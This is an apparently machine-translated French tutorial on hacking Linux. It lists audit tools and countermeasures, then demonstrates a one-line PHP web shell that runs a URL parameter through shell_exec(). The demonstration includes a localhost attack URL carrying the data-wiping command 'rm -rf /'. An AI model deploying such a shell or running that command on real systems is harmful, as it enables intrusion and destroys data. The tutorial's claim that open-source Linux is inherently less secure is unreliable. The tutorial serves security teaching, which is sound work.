Piratage du système d'exploitation Linux : piratage avec Ubuntu (Tutoriel sur les commandes)
Linux est le système d'exploitation serveur le plus utilisé, notamment pour les serveurs Web. C'est open source; cela signifie que n'importe qui peut avoir accès au code source. Cela le rend moins sécurisé par rapport aux autres systèmes d'exploitation, car les attaquants peuvent étudier le code source pour trouver des vulnérabilités.. Linux/Unix for Hackers consiste à exploiter ces vulnérabilités pour obtenir un accès non autorisé à un système.
Dans cet article, nous allons vous présenter ce qu'est Linux, ses failles de sécurité, le piratage avec Ubuntu et les contre-mesures que vous pouvez mettre en place.
Note rapide sur Linux
Linux est un système d'exploitation open sourceIl existe de nombreuses distributions de systèmes d'exploitation basés sur Linux, telles que Redhat, Fedora et UbuntuContrairement à d'autres systèmes d'exploitation, Linux est moins sûr en matière de sécurité. En effet, le code source est disponible gratuitement, il est donc facile de l'étudier pour détecter les vulnérabilités et de les exploiter par rapport à d'autres systèmes d'exploitation qui ne sont pas open source. Linux peut être utilisé comme système d'exploitation pour serveur, ordinateur de bureau, tablette ou appareil mobile.
Les programmes Linux peuvent être exploités à l'aide d'une interface graphique ou de commandes. Les commandes Linux pour Kali Linux le piratage est plus efficace et efficient que l'utilisation de l'interface graphique. Pour cette raison, il est utile de connaître les commandes Linux de base pour le piratage.
Référez-vous à ces tutoriels https://www.guru99.com/unix-linux-tutorial.html sur la façon de démarrer Kali Linux hacks.
Outils de piratage Linux
- Nessus– cet outil peut être utilisé pour Ubuntu pirater, analyser les paramètres de configuration, les correctifs et les réseaux, etc., il peut être trouvé sur https://www.tenable.com/products/nessus
- NMap. Cet outil peut être utilisé pour surveiller les hôtes qui s'exécutent sur le serveur et les services qu'ils utilisent. Il peut également être utilisé pour rechercher des ports. On peut le trouver à https://nmap.org/
- SAR – SARA est l'acronyme de Security Auditor's Research Assistant. Comme son nom l'indique, cet outil peut être utilisé pour auditer les réseaux contre des menaces telles que Injection SQL, XSS etc., il peut être trouvé sur http://www-arc.com/sara/sara.html
La liste ci-dessus n'est pas exhaustive ; cela vous donne une idée des outils disponibles pour Ubuntu piratage et piratage de systèmes Linux.
Comment empêcher les piratages Linux
Linux Hacking profite des vulnérabilités du système d'exploitation. Une organisation peut adopter la politique suivante pour se protéger contre de telles attaques.
- Gestion des correctifs– les correctifs corrigent les bugs que les attaquants exploitent pour compromettre un système. Une bonne politique de gestion des correctifs garantira que vous appliquerez constamment les correctifs pertinents à votre système.
- Configuration correcte du système d'exploitation– d'autres exploits profitent des faiblesses de la configuration du serveur. Les noms d'utilisateurs et démons inactifs doivent être désactivés. Les paramètres par défaut tels que les mots de passe communs à l'application, les noms d'utilisateur par défaut et certains numéros de port doivent être modifiés.
- Système de détection d'intrusion– ces outils peuvent être utilisés pour détecter un accès non autorisé au système. Certains outils ont la capacité de détecter et de prévenir de telles attaques.
Activité de piratage : pirater un Ubuntu Système Linux utilisant PHP
Dans ce scénario pratique, nous allons apprendre à pirater avec Ubuntu et nous vous fournirons des informations de base sur la façon dont vous pouvez utiliser PHP compromettre un Linux. Nous n’allons cibler aucune victime. Si vous souhaitez l'essayer, vous pouvez installer LAMPP sur votre ordinateur local.
PHP est livré avec deux fonctions qui peuvent être utilisées pour exécuter des commandes de piratage Linux. Il possède les fonctions exec() et shell_exec(). La fonction exec() renvoie la dernière ligne de la sortie de la commande tandis que shell_exec() renvoie le résultat complet de la commande sous forme de chaîne.
À des fins de démonstration, supposons que les gestionnaires de l'attaquant téléchargent le fichier suivant sur un serveur Web.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
ICI,
Le script ci-dessus obtient la commande de la variable GET nommée cmd. La commande est exécutée à l'aide de shell_exec() et les résultats sont renvoyés dans le navigateur.
Le code ci-dessus peut être exploité en utilisant l'URL suivante
http://localhost/cp/konsole.php?cmd=ls%20-l
ICI,
- «…konsole.php?cmd=ls%20-l»attribue la valeur ls –l à la variable cmd.
La commande en Ubuntu pour le piratage du serveur sera exécuté comme
shell_exec('ls -l') ;
L'exécution du code ci-dessus sur un serveur Web donne des résultats similaires aux suivants.
La commande ci-dessus affiche simplement les fichiers du répertoire courant et les autorisations
Supposons que l'attaquant passe la commande suivante
rm -rf /
ICI,
- "rm" supprime les fichiers
- « rf » exécute la commande rm en mode récursif. Suppression de tous les dossiers et fichiers
- "/" demande à la commande de commencer à supprimer les fichiers du répertoire racine
L'URL de l'attaque ressemblerait à ceci
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Résumé
- Linux est un système d'exploitation populaire pour les serveurs, les ordinateurs de bureau, les tablettes et les appareils mobiles.
- Linux/Unix est open source et le code source peut être obtenu par n'importe qui. Cela permet de repérer facilement les vulnérabilités. C'est l'un des meilleurs systèmes d'exploitation pour les pirates.
- Commandes de piratage de base et réseau dans Ubuntu sont précieux pour les pirates Linux.
- Les vulnérabilités sont une faiblesse qui peut être exploitée pour compromettre un système.
- Une bonne sécurité peut aider à protéger un système contre toute compromission par un attaquant.